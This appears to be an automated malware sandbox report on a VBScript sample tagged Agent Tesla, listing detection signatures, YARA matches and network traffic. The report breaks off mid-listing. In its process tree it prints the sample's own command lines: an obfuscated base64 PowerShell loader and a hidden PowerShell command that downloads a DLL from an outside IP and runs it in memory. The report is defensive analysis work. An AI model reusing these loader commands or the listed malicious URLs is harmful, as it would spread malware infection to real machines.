Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_COMPRA_.VBS

Overview

General Information

Sample Name:_COMPRA_.VBS
Analysis ID:626602
MD5:ebab128121287858484a652d8918a5da
SHA1:9cb2dcf0cf009633dc615bee5f1e70ef3b335208
SHA256:50761c08dfd1c70cf7406b9bd3ad99dce355f383a0bedacdc27b39cd06b3ed6f
Tags:agenttesla
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Generic Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 6256 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\_COMPRA_.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwBuAG???AdwAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AaABnAH???AdQByAHQAdAAvADEANwAxAC4AOAAxAC4AMwAzADEALgA1ADkAMQAvAC8AOgBwAHQAdABoACcAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6520 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/new.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.hguurtt/171.81.331.591//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6728 cmdline: powershell Copy-Item -Path C:\Windows\Temp\*.vbs -Destination C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
  • 0x14f8f9:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
SourceRuleDescriptionAuthorStrings
00000003.00000002.341381226.0000020DBAA07000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
  • 0x1accc:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000003.00000002.341350296.0000020DBA9C4000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
  • 0x2dc94:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmpSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
  • 0x244139:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: powershell.exe PID: 6388PowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x130462:$sa2: -encodedCommand
  • 0x13048e:$sa2: -encodedCommand
  • 0x130be9:$sa2: -EncodedCommand
  • 0x13170a:$sa2: -EncodedCommand
  • 0x1317a5:$sa2: -encodedCommand
  • 0xae66:$sb3: -windowstyle hidden
  • 0xb0cc:$sb3: -windowstyle hidden
  • 0xf9af:$sb3: -windowstyle hidden
  • 0x104ca:$sb3: -windowstyle hidden
  • 0x10a85:$sb3: -windowstyle hidden
  • 0x50b1a:$sb3: -windowstyle hidden
  • 0x51304:$sb3: -windowstyle hidden
  • 0x6b07b:$sb3: -windowstyle hidden
  • 0x6b256:$sb3: -windowstyle hidden
  • 0x6b4af:$sb3: -windowstyle hidden
  • 0x6bab2:$sb3: -windowstyle hidden
  • 0x9eb43:$sb3: -windowstyle hidden
  • 0x9ed1e:$sb3: -windowstyle hidden
  • 0xd760c:$sb3: -windowstyle hidden
  • 0xd8885:$sb3: -windowstyle hidden
  • 0xd8a60:$sb3: -windowstyle hidden
Process Memory Space: powershell.exe PID: 6388INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xae28:$b2: ::FromBase64String(
  • 0xaeed:$b2: ::FromBase64String(
  • 0xb08e:$b2: ::FromBase64String(
  • 0xf971:$b2: ::FromBase64String(
  • 0x1048c:$b2: ::FromBase64String(
  • 0x10a46:$b2: ::FromBase64String(
  • 0x50adc:$b2: ::FromBase64String(
  • 0x512c8:$b2: ::FromBase64String(
  • 0x5299c:$b2: ::FromBase64String(
  • 0x6b03f:$b2: ::FromBase64String(
  • 0x6b218:$b2: ::FromBase64String(
  • 0x6ba75:$b2: ::FromBase64String(
  • 0x9eb07:$b2: ::FromBase64String(
  • 0x9ece0:$b2: ::FromBase64String(
  • 0xa0e22:$b2: ::FromBase64String(
  • 0xd75ce:$b2: ::FromBase64String(
  • 0xd8849:$b2: ::FromBase64String(
  • 0xd8a22:$b2: ::FromBase64String(
  • 0xeff93:$b2: ::FromBase64String(
  • 0xf0459:$b2: ::FromBase64String(
  • 0xf124b:$b2: ::FromBase64String(
Click to see the 3 entries
SourceRuleDescriptionAuthorStrings
3.2.powershell.exe.20dab669c50.0.raw.unpackSUSP_Reversed_Base64_Encoded_EXEDetects an base64 encoded executable with reversed charactersFlorian Roth
  • 0x17f4e9:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
3.2.powershell.exe.20dab669c50.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    3.2.powershell.exe.20dab669c50.0.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
    • 0x1681ea:$h1: //:ptth
    • 0x16882e:$h1: //:ptth
    • 0x168892:$h1: //:ptth
    • 0x83a2:$s1: DownloadString
    • 0x8397:$s2: StrReverse
    • 0x83e4:$s3: FromBase64String
    • 0x834f:$s4: WebClient
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: _COMPRA_.VBSVirustotal: Detection: 22%Perma Link
    Source: http://20.106.232.4/rumpe/newrumpe.pdfAvira URL Cloud: Label: malware
    Source: http://195.133.18.171Avira URL Cloud: Label: malware
    Source: http://20.106.232.4/dll/new.pdfAvira URL Cloud: Label: malware
    Source: http://20.106.232.4Avira URL Cloud: Label: malware
    Source: http://195.133.18.171/ttruugh.txtAvira URL Cloud: Label: malware
    Source: http://195.133.18.171Virustotal: Detection: 17%Perma Link
    Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 00000003.00000002.341706617.0000020DC2980000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

    Networking

    barindex
    Source: Yara matchFile source: 3.2.powershell.exe.20dab669c50.0.raw.unpack, type: UNPACKEDPE
    Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Sat, 14 May 2022 13:21:51 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 12 May 2022 22:03:48 GMT ETag: "11aac-5ded7bb7a622a" Accept-Ranges: bytes Content-Length: 72364 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 62 71 32 72 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 4d 77 41 41 41 41 47 41 41 41 41 41 41 41 41 44 75 73 41 41 41 41 67 41 41 41 41 41 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 42 41 41 51 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4d 44 71 41 41 42 4c 41 41 41 41 41 41 41 42 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 42 41 41 77 41 41 41 42 38 36 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 46 4d 73 41 41 41 41 67 41 41 41 41 7a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 41 41 45 41 41 41 51 41 41 41 44 4f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 43 41 42 41 41 41 43 41 41 41 41 30 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 77 36 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 6b 48 6b 41 41 44 78 4c 41 41 41 44 41 41 41 41 41 41 41 41 41 4d 7a 45 41 41 44 41 49 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 49 6f 6d 51 41 41 42 67 49 6f 44 67 41 41 43 69 6f 41 41 41 41 79 4b 4a 6b 41 41 41 59 43 4b 41 38 41 41 41 6f 71 41 41 41 41 75 69 69 5a 41 41 41 47 63 78 41 41 41 41 71 41 41 51 41 41 42 48 4d 52 41 41 41 4b 67 41 49 41 41 41 52 7a 45 67 41 41 43 6f 41 44 41 41 41 45 63 78 4d 41 41 41 71 41 42 41 41 41 42 43
    Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Sat, 14 May 2022 13:21:53 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 12 May 2022 22:01:31 GMT ETag: "1a220-5ded7b35b18e6" Accept-Ranges: bytes Content-Length: 107040 Content-Type: application/pdf Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91
    Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
    Source: global trafficHTTP traffic detected: GET /dll/new.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /rumpe/newrumpe.pdf HTTP/1.1Host: 20.106.232.4
    Source: Joe Sandbox ViewIP Address: 195.133.18.171 195.133.18.171
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
    Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.133.18.171
    Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.133.18.171/ttruugh.txt
    Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.133.18.171x
    Source: powershell.exe, 00000003.00000002.337235213.0000020DAB591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.4
    Source: PowerShell_transcript.035347.PDp+ZyLV.20220514152147.txt.3.drString found in binary or memory: http://20.106.232.4/dll/new.pdf
    Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.4/rumpe/newrumpe.pdf
    Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.48
    Source: powershell.exe, 00000003.00000002.337253428.0000020DAB59E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.4x
    Source: powershell.exe, 00000001.00000002.349233739.0000015ED9E81000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341945346.0000020DC2A3C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.305024899.000002427BBF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000006.00000002.305490212.000002427BD40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microq
    Source: powershell.exe, 00000003.00000002.341142244.0000020DBA852000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.302980565.000002421006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.293300830.0000024200211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.346642450.0000015EC1C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.332620182.0000020DAA7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.